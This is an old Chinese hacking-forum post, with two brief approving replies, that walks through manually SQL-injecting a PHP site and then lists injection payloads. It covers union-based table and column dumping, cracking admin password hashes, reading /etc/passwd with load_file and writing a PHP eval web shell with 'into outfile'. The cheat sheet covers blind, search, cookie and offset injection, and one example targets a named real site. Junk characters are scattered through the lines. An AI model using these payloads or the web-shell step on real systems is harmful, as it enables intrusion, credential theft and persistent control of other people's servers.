找回密码
 立即注册
查看: 3265|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~- t0 N5 q8 J( Z, H
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?8 X2 y  b' z8 B# q
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
( A8 {0 L- ]" R3 C* G" i如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
/ z% k5 H3 O8 O2 t1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)4 C; z3 _7 V) {" l- K- S: }
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
2 q) }/ P1 q  Y( ^! L- t; ?Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
: |/ n3 m" ^6 ^8 I0 y/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入/ ]6 O2 n+ `' y3 P0 C9 m' o
                         5 X6 }0 P/ B+ @6 \1 R2 c3 ~' V
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
( T( U, u: U0 V% b' E3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意8 _) F: V/ ^& r: Y: j
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
* C: k* G9 U) J; x5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。6 y0 o8 X7 P: C, u0 y* R0 k: j( }
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
$ B# }' i* J8 g2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。' E( J# s. m9 d* \
我就用的是第二个思路,! z$ `2 R$ R" z& h
提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  
# u0 n3 o- Q( t! k! C6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,0 Y- b( ?2 ?. |% ?3 `3 S1 }: b6 X) ]3 x
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
2 ~: T* R" b2 Q注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。8 w1 {6 ]2 I' X4 O
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????0 c1 Q; y! x( g, ^& q* s% x- G, k
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
4 ^% L$ s7 R7 A. h) S提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --) e9 G  \. q, q! J. x! [" L
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
% ]  y% j. w& _% u/ l调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
! L1 G1 \3 e/ ^' ?5 ]: s! P, Q# `下面是一些很普遍注入方式资料:
: H/ h* Z7 f. K7 b- k注意:对于普通的get注入,如果是字符型,前加' 后加 and ''=': F+ {) Q* k! X( x8 S3 K# ^0 W" ]. J
拆半法
5 e  P. z4 A' E/ _! j, }- f######################################
% C' E6 @" ~1 R5 hand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
! a0 K+ K% b9 ~& j3 ^and exists (select * from admin)
0 ^+ U& _. ?7 E% kand exists(select id from admin)
( @( U4 X# J) ?/ h$ ?$ K2 h1 pand exists(select id from admin where id=1)( [  X- ]0 K) e; X9 G& k
and exists(select id from admin where id>1) 9 T- L% o$ i! J; `$ s1 i
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 9 R7 ^5 y5 i1 d0 L6 j9 ?/ o9 r
and exists (select username from admin)
: |0 I( T: L+ j2 t6 nand exists (select password from admin)& s$ ?) u; L6 K: o! V
and exists (select id from admin where len(username)<10 and id=1)
# x$ ~, y9 ]) g0 E  L7 band exists (select id from admin where len(username)>5 and id=1)* L( f* Y; W' D, k0 e( r: X1 d/ Q7 b
and exists (select id from admin where len(username)=6 and id=1)
3 ^; F4 J' s# P' Vand exists (select id from admin where len(password)<10 and id=1)
4 R2 O; U- v) N2 y# [and exists (select id from admin where len(password)>5 and id=1)
' w) J7 d! n' E8 o1 @6 x9 xand exists (select id from admin where len(password)=7 and id=1)
; @4 Y& f; ?0 Cand (select top 1 asc(mid(username,1,1)) from admin)=97
- U4 X7 q5 X' w* w( h2 e) a) P返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。' x: }" e# w  z! G: v$ T+ T
猜第二位把username,1,1改成username,2,1就可以了。/ n$ X" h: I# P, f6 `' t3 m$ u
猜密码把username改成password就OK了
& P, s3 w6 n" j$ z! l! L##################################################" o/ w% r- p) U1 T3 L; N
搜索型注入
9 O+ L" C% ?. y+ K/ x7 c3 W6 a- B/ I##################################
2 ~- J: a4 j6 W  s  q%' and 1=1 and '%'='0 t! r# S1 B# q, ?" A& u/ Y
%' and exists (select * from admin) and '%'='
! A8 Z& h* K; z$ Y* }" R%' and exists(select id from admin where id=1) and '%'='
4 m2 D7 d- u4 n- E% N%' and exists (select id from admin where len(username)<10 and id=1) and '%'=') j; t- T* E+ n  x- Q/ L
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
( k% O3 F- _$ g%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='( W8 r1 R# }/ U& P# p1 W# [" B
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='9 Q; @6 s# O6 E) p
对于MSSQL数据库,后面可以吧 and '%'='换成--
3 u/ j; A! ^$ K  q' [1 @还有一点搜索型注入也可以使用union语句。( ]; e. @0 s$ q( l6 j, `
########################################################
# [: a, H; V  G# o2 M联合查询。
6 V& f1 L7 Q  S; W8 F6 T) N$ v#####################################7 v9 l& V8 `: N# S
order by 107 ~' T  y  p) Q- n& N. U
and 1=2 union select 1,2,3,4,5,6,7,8,9,10/ r- e5 s# t3 I7 I3 v8 N
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
  j! \% `; c6 s8 H6 nand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
6 ]1 k$ k' x1 A* E很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
4 i/ L4 v* ]; l8 z7 R% ?2 b0 V###################################" ^6 K8 ?' j( _$ N5 S% W  n
cookie注入* f. t5 |. d7 U0 `4 E1 I9 ]/ A
###############################: O/ i- U& e7 l" r
http://www.******.com/shownews.asp?id=1273 N4 w/ M3 x* g# g8 o& ^8 o$ }0 g
http://www.******.com/shownews.asp
5 @- g! t8 I+ T; g/ A* malert(="id="+escape("127"));
2 @3 K5 M: K1 X/ jalert(="id="+escape("127 and 1=1"));
% L; T5 r* g0 h. B1 valert(="id="+escape("127 order by 10"));
! K; Y: X- A' W% Walert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));0 E, e+ V! e( G- z8 ^" S& q
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
) ~1 q: L2 k0 A9 L; i# B这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
+ f$ c+ J! I8 \2 ]4 d4 x; ]; u/ e1 N###################################
, g7 T5 @' W2 Z8 ?- b( g3 z% `偏移注入5 c" q' [: i1 `/ Y: K% x% M# \
###########################################################( a( Z/ }( T' M4 P8 `- y
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin0 A- T0 q% g  o* H
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin9 N; d4 G, t- c; W& m
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)/ H* i3 S+ I3 D! _2 j% ^! g& I
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
  L6 J2 u. E8 \/ A! ?; N6 Ounion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)2 @7 G, X5 u9 c  r
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)  @5 f; h$ F% b2 Z2 Y
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on0 v: {+ U! `" C" G  ~
a.id=d.id); z9 E+ B; l+ N
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)- g7 }% f+ p4 w9 x; {
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
! j: q- e/ E2 e5 {/ T  4 m3 r! X0 ]% U# {# o
============================================================================================================5 e% |0 h* ]- v: a
1.判断版本
9 l! {- \9 `( k; Iand ord(mid(version(),1,1))>51
' W/ \5 S1 h0 t5 {1 S) \# T  {返回正常,说明大于4.0版本,支持ounion查询. F7 @2 {# X; J0 |* N& {" }" I
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解: U5 _' N4 `' L
and 2=4 union select 1,2,3,4,5,6,7,8,9--3 M1 u4 Q5 R; Q2 S9 J; p
3.查看数据库版本及当前用户,$ g! ^5 v' C# L) n
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
* Q) K+ f/ _! m# ?  [7 e数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,, w+ ~/ Q% p. G8 S- F
4.判断有没有写权限4 A, I" `' V( c! o9 P1 Z6 c7 S
and (select count(*) from MySQL.user)>0-- 3 X5 H* L4 |5 ^: W
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
5 }; D8 ?& p- [4 u9 G, V+ f4 L用不了这个命令,就学习土耳其黑客手法,如下
( o$ w& V. C% x. {5 }( land+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--) V0 \" F: @9 w8 m
6.爆表,爆库$ y! o! i. I, W' F' o# w9 _- [
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
6 H8 `7 _" v+ G7.爆列名,爆表$ i; `. S; m4 G% h
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
& r" @* B1 x: D# y1 P: R: n# v3 x- V  k* ~8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
: A  c* U/ N1 Z1 \1 Pand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
3 ]: j) H7 s. p; H+ f/ _9.爆字段内容
3 G4 y5 s. W0 ~9 a8 eand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--5 ~! Q+ t  K. {% x9 d' ?
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表